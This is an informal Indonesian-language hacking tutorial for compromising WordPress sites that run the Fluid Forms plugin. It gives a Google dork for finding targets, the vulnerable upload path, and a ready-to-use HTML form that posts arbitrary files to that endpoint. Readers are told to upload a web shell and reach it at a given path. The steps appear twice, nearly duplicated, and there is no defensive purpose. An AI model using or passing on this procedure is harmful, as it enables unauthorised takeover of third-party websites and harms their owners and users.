Dork: inurl:fluid_forms
. Masukan Dork ke kotak pencarian Google
. Pilih target, lalu masukan Exploit. contoh:
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/
(Cari yang vuln)
CSRF:
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*ganti target.co.li -> url web target anda
* save as: .html
. Jika sudah buka file csrf dgn web browser anda, lalu Upload file/shell yang ingin kalian Upload ke web target :p
(Selebihnya gunakan imajinasi, biar dpt yg Vuln and Perawan)
Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/
. Masukan Dork ke kotak pencarian Google
. Pilih target, lalu masukan Exploit. contoh:
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/
(Cari yang vuln)
CSRF:
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*ganti target.co.li -> url web target anda
* save as: .html
. Jika sudah buka file csrf dgn web browser anda, lalu Upload file/shell yang ingin kalian Upload ke web target :p
. Shell Akses: /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php
Tutor berantakan? Bodo :v w ngantuk..
Sekian
-MrHun74 (member luar gc)